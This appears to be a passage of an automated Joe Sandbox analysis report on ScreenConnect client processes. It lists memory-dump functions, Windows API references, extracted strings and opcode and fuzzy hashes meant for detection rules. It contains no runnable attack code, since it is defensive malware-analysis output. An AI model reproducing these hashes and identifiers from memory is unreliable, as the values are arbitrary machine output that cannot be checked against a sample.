SetProcessMitigationPolicy.KERNELBASE ref: 00007FFD9B898542

Memory Dump Source

Source File: 00000009.00000002.1936991286.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID: MitigationPolicyProcess
String ID:
API String ID: 1088084561-0
Opcode ID: a3e912e21b7c1d0a48cd9c2c1faf73fb589c021ca844da811219c7ded1300798
Instruction ID: 4057da36f3fd61b1dca1522dc108e480ef9a488bbd7d416996a9a30966981e05
Opcode Fuzzy Hash: a3e912e21b7c1d0a48cd9c2c1faf73fb589c021ca844da811219c7ded1300798
Instruction Fuzzy Hash: 7521E97191CB188FDB289F9DDC4A9F97BE0EB59711F00413EE049D3251DB74B8468B81

Function 00007FFD9B8984B8 Relevance: 1.6, APIs: 1, Instructions: 105
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetProcessMitigationPolicy.KERNELBASE ref: 00007FFD9B898542

Memory Dump Source

Source File: 00000009.00000002.1936991286.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID: MitigationPolicyProcess
String ID:
API String ID: 1088084561-0
Opcode ID: 40355cf6e12e6d8f39bd0d23972fd11018fe1fcaccaa7ae7c72bffbf9b23c58c
Instruction ID: a5a7dba11d6690a301fc092e67294fa205bdbe178ce6f5b3b7d8fe31adc48a1e
Opcode Fuzzy Hash: 40355cf6e12e6d8f39bd0d23972fd11018fe1fcaccaa7ae7c72bffbf9b23c58c
Instruction Fuzzy Hash: 5431D77191CB188FDB28DF9D9C4A9F97BE0EB59711F00422FE059D3251DB74A845CB82

Function 00007FFD9B893DFA Relevance: 1.3, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE ref: 00007FFD9B8AF4DC

Memory Dump Source

Source File: 00000009.00000002.1936991286.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: a4a7b23c056d25cf6bc4ababaaef9c7b9628244cf654b7af7f3234a37cb1326c
Instruction ID: 478a4c69f5b225a01c068e5830f5c4731603470d171a95f0f164fb6291ea43d7
Opcode Fuzzy Hash: a4a7b23c056d25cf6bc4ababaaef9c7b9628244cf654b7af7f3234a37cb1326c
Instruction Fuzzy Hash: CC21D331A08A1C9FDB5CDF98D449BF9BBE0EB69321F10422ED04DD3651DB74A856CB90

Analysis Process: ScreenConnect.ClientService.exePID: 7736, Parent PID: 7700COMMON

Executed Functions

Function 00E520B5 Relevance: 2.9, Strings: 2, Instructions: 368COMMON

Download Yara Rule

Strings

, xrefs: 00E5237E
nCvq, xrefs: 00E52351

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID: nCvq$
API String ID: 0-222869378
Opcode ID: e8f2739b2866f60cc3c23b826f4a81d8921a6c90ac7d4ff7bdceda1c5963011c
Instruction ID: fb4b083595e072f8ea072dc0218d8a17a9bee2fa0e40a9e95759c921341cf480
Opcode Fuzzy Hash: e8f2739b2866f60cc3c23b826f4a81d8921a6c90ac7d4ff7bdceda1c5963011c
Instruction Fuzzy Hash: 3E51D2307002018FC714EB39D9596AEBBE2EF89315B1448ADD906EB361EF35DC4ACB91

Function 00E51828 Relevance: 2.5, Strings: 2, Instructions: 45COMMON

Download Yara Rule

Strings

$^q, xrefs: 00E5188D
$^q, xrefs: 00E51899

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: e7ffec7c75e119411ac605f6309db6ad542e805a62ca85dc9b9af9617f8a18a4
Instruction ID: 30bf1c660b252262ddafc342c127ca856f0b48e904ef87b0b007db80a7a6b1fc
Opcode Fuzzy Hash: e7ffec7c75e119411ac605f6309db6ad542e805a62ca85dc9b9af9617f8a18a4
Instruction Fuzzy Hash: 4D01DF34B09344CFC71A9B34D4089257FB1EF4A71631688EAE805CF366CB319C86CB21

Function 00E55238 Relevance: 1.4, Strings: 1, Instructions: 192COMMON

Download Yara Rule

Strings

(bq, xrefs: 00E5525A

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: f4209c2c1b76988210cd44e9bb936b2fa5c22b8648b45c22b5cb3c7d58fe81e4
Instruction ID: ec0a75989bdc24aa6a3e6a5f8f227b98cf0b01c95c3b489f6db0e0a0d8bb4dba
Opcode Fuzzy Hash: f4209c2c1b76988210cd44e9bb936b2fa5c22b8648b45c22b5cb3c7d58fe81e4
Instruction Fuzzy Hash: 74611639B106058FCB14DFA9D894AAEB7B2FF89305B119468E906AB365DB30EC059F40

Function 00E56F40 Relevance: 1.4, Strings: 1, Instructions: 181COMMON

Download Yara Rule

Strings

LR^q, xrefs: 00E570CB

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 573598990ef53732e774529b99613551b358845e2969761b3915fad9aab9be17
Instruction ID: 61ca82e9fbc222e8ef931274de1419527f2788896e29085750589d206f3edd6e
Opcode Fuzzy Hash: 573598990ef53732e774529b99613551b358845e2969761b3915fad9aab9be17
Instruction Fuzzy Hash: 93511730B082009FDB149F75E854B6EB7F2EF84705F148969E886EB2E1DB319C49C791

Function 00E542F0 Relevance: 1.4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

(bq, xrefs: 00E54311

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: 7890430a0966534e0b72671995c202c8e8b89b6b9b70f7512b4d92ea89488517
Instruction ID: 8eee388b0bfb1cceb6aa3b181584c7f1b35b3674ce472e95646ec8980e7f392c
Opcode Fuzzy Hash: 7890430a0966534e0b72671995c202c8e8b89b6b9b70f7512b4d92ea89488517
Instruction Fuzzy Hash: 1641D130A00105CFCB15EF69E5846ADBBB6EF84315F04C969D919AB395DF34EC4ACB90

Function 00E53480 Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

[', xrefs: 00E53548

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID: ['
API String ID: 0-410297704
Opcode ID: 1281f709fbd80bb132d2161e79d04e45fc354d3ce35a1a364ffcbbb5ca0f833b
Instruction ID: 256fa0d179d62daf42232b7afe14cd1971f0edb5b6816798ccd3d63f4591fd78
Opcode Fuzzy Hash: 1281f709fbd80bb132d2161e79d04e45fc354d3ce35a1a364ffcbbb5ca0f833b
Instruction Fuzzy Hash: B631B2347416119F8701EB7EA89556EBBE2EBC53503114528D816EB354EF70EE0A8BE1

Function 00E57688 Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a26e706b75eeaa0e916ab887d57e1ba20204e47f86fe759f1d21503b3c78be5
Instruction ID: 97dffedaa5ee8a267c739361403d26ff71dc2728b3477c2ef67a5a69bc6427fc
Opcode Fuzzy Hash: 8a26e706b75eeaa0e916ab887d57e1ba20204e47f86fe759f1d21503b3c78be5
Instruction Fuzzy Hash: B451B034E053498FDB05EF78E885BE8BBB1FF85300F118555E044AB2A5DB74A99ACB60

Function 00E54940 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5570398c7fc1b0e4e40ce6ba8746ae0d28d848dcf6b70e29950d927fcb5e3d85
Instruction ID: 4ba40b111710f697b7846db763303ca3207f0f2a7be79d94a5133cc627af9cde
Opcode Fuzzy Hash: 5570398c7fc1b0e4e40ce6ba8746ae0d28d848dcf6b70e29950d927fcb5e3d85
Instruction Fuzzy Hash: 60512A746006018FC724CF2AD884A56B7F2FF8D329B145A5CD896AB7A5EB31E849CB44

Function 00E57770 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0e4faff5115309ebc5f6434d49c65d1938acee4043d7a62ca65864622119072
Instruction ID: 54e772db288ac421946d0e8b1a19a38836afb18b7a3c459cfcf82410348f689e
Opcode Fuzzy Hash: c0e4faff5115309ebc5f6434d49c65d1938acee4043d7a62ca65864622119072
Instruction Fuzzy Hash: 8F516C34E003098FCB01EFB8D845BDDBBB2EF89300F109559E004AB354EB75A999CB60

Function 00E5366A Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3aabee35fc0cc06c02cce15527f6c805072cea3c78edbe4730d17a668a10049
Instruction ID: 4298a79f142e3e31dbecc7fe89ae4f18e596c55db7f9587de0014e5a38482cf1
Opcode Fuzzy Hash: b3aabee35fc0cc06c02cce15527f6c805072cea3c78edbe4730d17a668a10049
Instruction Fuzzy Hash: 41414CB4A007058FCB24DF39D84469ABBF1FF88356B105A29D456EB7A0DB30ED49CB90

Function 00E53678 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1049e918ffd86f9100a4388e90b73d2b2e202bfd68ac1458822c8c35477e9a93
Instruction ID: 8fc462884c4e13595d1e81efe63330de48c2a3f3d9c0f8c9a08f3965b93b2e66
Opcode Fuzzy Hash: 1049e918ffd86f9100a4388e90b73d2b2e202bfd68ac1458822c8c35477e9a93
Instruction Fuzzy Hash: 5F414BB4A007058FCB24DF39D94465ABBF1FB88756B104E29D456AB7A0EB30ED49CB90

Function 00E53DC0 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f08a4ae022caabbd48e9d6691128587d78f52ab5acd9f7f0511b91c0cdc60a5a
Instruction ID: 1d407dac6a28435274640d35dfa96a37e619b6d5cbbb135baf09aa3951b5bba3
Opcode Fuzzy Hash: f08a4ae022caabbd48e9d6691128587d78f52ab5acd9f7f0511b91c0cdc60a5a
Instruction Fuzzy Hash: E531BC36B002068BCB108F69C4596AFF7F1EF89395F10986AE906E7394DF71DD088B90

Function 00E53828 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb3f92982607aca655a5363b7634840de82fc4bc18fa39134cbfde38f755203e
Instruction ID: 8ded53a187163b11ac9cc9694078aad369ebc8b1d40a89be0808bbd0938b0c5b
Opcode Fuzzy Hash: bb3f92982607aca655a5363b7634840de82fc4bc18fa39134cbfde38f755203e
Instruction Fuzzy Hash: 82314635F041858FC709DB78C8546AEFFB2EFC6340B1580AAD908EB395DA309E0AC791

Function 00E55548 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79a5949a562d51acf63c3feff8f37c7bf709b66a10b73b3532a0520b9a653c3e
Instruction ID: 8d017e0b027794cf4efbdc515715def92880f9191848091103caaa9ef21e429b
Opcode Fuzzy Hash: 79a5949a562d51acf63c3feff8f37c7bf709b66a10b73b3532a0520b9a653c3e
Instruction Fuzzy Hash: B5314F35600B01CFC730CF29D894666B7F2EF89325B144A1CD856EB7A0E730E949CB91

Function 00E54FD0 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18f7dbe0f028dbb1f51106bd028717f4ae676310137e6c3c454fb8ec2f82af9f
Instruction ID: 46349210693293e91b6943bce06cef472911003bd4097db43709cdf90056a4f6
Opcode Fuzzy Hash: 18f7dbe0f028dbb1f51106bd028717f4ae676310137e6c3c454fb8ec2f82af9f
Instruction Fuzzy Hash: 82318631A0010ADFCF00DFA8D9409DDBBB6FF85305F148465E905BB265DB356A4BCBA0

Function 00E550C1 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a12c6105bdb10072a1b033cd4fea87780ad027d325c7061dc960843a61287fe8
Instruction ID: d9f925a51af1ca0b8ff4fe43dcda1ddfbbff074bcf8a589c01e2b1c6cea85e9b
Opcode Fuzzy Hash: a12c6105bdb10072a1b033cd4fea87780ad027d325c7061dc960843a61287fe8
Instruction Fuzzy Hash: 23210F357002449BD701FB28E85167EBBE2EFC1300F008528E905AB395DF30AE0A8BF1

Function 00E54B70 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b1408e8492532383d0880ef60b48611fe71e098ea46096aadf93c9a23412289
Instruction ID: 57839665900430b9677dac0ca1f11fedaff73ba68b072a16b71bef135985bbf0
Opcode Fuzzy Hash: 4b1408e8492532383d0880ef60b48611fe71e098ea46096aadf93c9a23412289
Instruction Fuzzy Hash: 4B2119702006058FD734CF26D84869AB7F1EF85325B109E2DD892A76E1DB31E98ACF80

Function 00E550D0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb129de5e7dea03eeacd63ca9d83728e90f600a0efc2f156f7ee3b45e654ca33
Instruction ID: e8519e205107408f1b2b893babd9292574454082c0a15d749d4750911bd4e65f
Opcode Fuzzy Hash: bb129de5e7dea03eeacd63ca9d83728e90f600a0efc2f156f7ee3b45e654ca33
Instruction Fuzzy Hash: 861190317402045BD704FB69E955A7EBBE7EBC4310F508528E909AB394DF70AE0A87F1

Function 00E54F41 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c75e123e4fe5e2df83430a134a6eb6dc5c220e15ca241d10b8c7a861864fe18
Instruction ID: 5db85592103c67be278d68ff5d2b75386b571ad01779e70599e366d5d077827e
Opcode Fuzzy Hash: 9c75e123e4fe5e2df83430a134a6eb6dc5c220e15ca241d10b8c7a861864fe18
Instruction Fuzzy Hash: B8114635A0024A9FCB01DF68D9409DEBBF5FF4A304B14859AE905FF261D731AE06CBA1

Function 00E56E58 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c670841b96746dde5f6bdb784c2ba483b70a9154c35b671beecd452f28d8a13a
Instruction ID: 9c359ef010ae791e72cf0b62d287e238c462cfea98f3de9a9da5913f1111e373
Opcode Fuzzy Hash: c670841b96746dde5f6bdb784c2ba483b70a9154c35b671beecd452f28d8a13a
Instruction Fuzzy Hash: 53012235B042109FCB008F6ED80009BBBE9EBC93143118A6AE404DF316EEB1EE098BD0

Function 00E55649 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a1f1e96446e231ef0fb3641b7da5e5c743346201bfc07f9963ea68799a49c45
Instruction ID: a8ad5601f5d9b23415892393adf7e6a863c35b6a40f76640a40066095608defc
Opcode Fuzzy Hash: 6a1f1e96446e231ef0fb3641b7da5e5c743346201bfc07f9963ea68799a49c45
Instruction Fuzzy Hash: 4C110671E00284AFDB11CF68C8509EEBBB6AFC5311F44C8AAD994EB165D7719906CB81

Function 00E55658 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b995cd5e03597890cf3a3950e794a6d9989aa0feb1ba3e47fc78da253e6d93c
Instruction ID: 5be786ced74a0726d88962bbc87d3ffa5da218193827bf87bfcdcb993a17d3dd
Opcode Fuzzy Hash: 4b995cd5e03597890cf3a3950e794a6d9989aa0feb1ba3e47fc78da253e6d93c
Instruction Fuzzy Hash: 8411E131B00204AFDB10CEA8C810AABB7B6AFC4311F94C876E944E7254D7B1DA05CB91

Function 00E55035 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12df63feaa97a8e67bb61bcf3602920708ff2406b3e0fd5ec847b4137da7edb7
Instruction ID: cb76651363989ac9651cd2ae7bdbe147ebf822779b7fbefe4961e2ee03a23a58
Opcode Fuzzy Hash: 12df63feaa97a8e67bb61bcf3602920708ff2406b3e0fd5ec847b4137da7edb7
Instruction Fuzzy Hash: 48115E32540049DFCF00DFA8D9548ECBFB2EF81315B58D894E405BB1A9DB71E98ACBA0

Function 00E5360A Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b1fe8ec939d0688371f746e15620beca77171fbe0ed0de571b3d164106fb9f6
Instruction ID: 6d435d4cfb595565a62c24463cbd567fcd1bf6a8fa6a655758c6b703e26bdbf1
Opcode Fuzzy Hash: 5b1fe8ec939d0688371f746e15620beca77171fbe0ed0de571b3d164106fb9f6
Instruction Fuzzy Hash: 4301DF3A7442409FC721DB2AE84445AFBA2EAC5365324467AD84ADB361EA70ED0B87D0

Function 00E54F50 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 476ae5c5182fda4d649a8a711614e087a8c810ae8cb5a5303998a0d6d0e5aba5
Instruction ID: 9df6e9a45267dd4644b53f1b30be59db3bbd6c11552f659b4c0b662b6a019a62
Opcode Fuzzy Hash: 476ae5c5182fda4d649a8a711614e087a8c810ae8cb5a5303998a0d6d0e5aba5
Instruction Fuzzy Hash: CA111635A0010A9FCF01DFA8D9409DEBBF5FF49314B108555E909FB265D771AA06CBA0

Function 00DED01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931376720.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ded000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1192235203c251c43342299dd5c4293fd4adf00d6c197ab81c358f8f3e0219ca
Instruction ID: f70d75be4cca6ca9b8c8d881901060dc2ddcaaca269dac8f30328e641f1ec701
Opcode Fuzzy Hash: 1192235203c251c43342299dd5c4293fd4adf00d6c197ab81c358f8f3e0219ca
Instruction Fuzzy Hash: 04012B710083809EE7106B2BCD84767BF99EF41324F1CC529EC490B186CA79D841C6B1

Function 00DED005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931376720.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ded000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a08751d4e4704cc756fe8cf9c980d98721f8f08a89989206267d719af995ee91
Instruction ID: 7b3e8937eb9454d30963d12cd9eb949bef5acae83e501c986c4babe48f3b1b27
Opcode Fuzzy Hash: a08751d4e4704cc756fe8cf9c980d98721f8f08a89989206267d719af995ee91
Instruction Fuzzy Hash: 3B014C6100E3C09ED7128B258894B52BFB4EF53224F1DC1DBD8888F1A7C2699849C772

Function 00E57FF8 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2bf7c3f77e24b1f047d1e0776a9acd113b4caae65db2af2c85de7749dacfb3b
Instruction ID: a8973ac330edbf01e491a498c22807268e6c0ddda0465165295cd4e789146e6c
Opcode Fuzzy Hash: a2bf7c3f77e24b1f047d1e0776a9acd113b4caae65db2af2c85de7749dacfb3b
Instruction Fuzzy Hash: 7F01D13620D3808FD364CF38E441686BBE1EFA6700F09886EE4C5CB380DA36AC45CB25

Function 00E58168 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbdfa0feab6c03f6036a05e8ede155477197993df506c2a4d88486a14ccff927
Instruction ID: 0b1e1fdd84a1bef5360df0ab37f207bd1387ac9de2edf93c1f9a1f9618ea1bbb
Opcode Fuzzy Hash: bbdfa0feab6c03f6036a05e8ede155477197993df506c2a4d88486a14ccff927
Instruction Fuzzy Hash: 57F05836B092146AD728CABAA40069BBBDACBD4624B14847FE58DD3680E931A8018765

Function 00E512A0 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaeae8edc1038adc5b8a43a5a5a2c3bbc5862108ba78c4e1d4ad763265d341df
Instruction ID: 6ad3cf669b607b578ab69d3de93264f8392252075eeea46619f00da52a50c406
Opcode Fuzzy Hash: aaeae8edc1038adc5b8a43a5a5a2c3bbc5862108ba78c4e1d4ad763265d341df
Instruction Fuzzy Hash: 7FF0B4392402048FCB01EB7DE495AAE7FD1DFC4311715857ED91AEB719DB20A8098B91

Function 00E55F68 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6b76ce7f4c28098627ee8017749f2611de01d6b79ec57643eefab2bb8891a2b
Instruction ID: 692190eb6147761cb89c6ac16d82b5f3bb1cb570094e03a2ca4e9d825c0fdb96
Opcode Fuzzy Hash: c6b76ce7f4c28098627ee8017749f2611de01d6b79ec57643eefab2bb8891a2b
Instruction Fuzzy Hash: E9F0E533701D419F8701865CE864444BBEA8F5A36636C8AA2F814DF382EB11DC4683A1

Function 00E51414 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e366036bc126078a3b790cf0e377c3218721ba7982de5c86e3fa1ed3d814af8a
Instruction ID: 5d60ee8225fefd94339e76d525eb85ced1c35721925d630b321a911860463322
Opcode Fuzzy Hash: e366036bc126078a3b790cf0e377c3218721ba7982de5c86e3fa1ed3d814af8a
Instruction Fuzzy Hash: 70F0246310C2904FD313DB3CE8213A8BFA0EE923103090ADBD4818F6AAD755EA4DD761

Function 00E51DA1 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1931761587.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e50000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d41f86f925068313d4678a2dd61a2e56706f318a41c7800c10be797e4b8d588
Instruction ID: eadefc44644f917d81edd87898d6c8c3052d987afb4545fb086f1f9eeb9e4525
Opcode Fuzzy Hash: 4d41f86f925068313d4678a2dd61a2e56706f318a41c7800c10be797e4b8d588
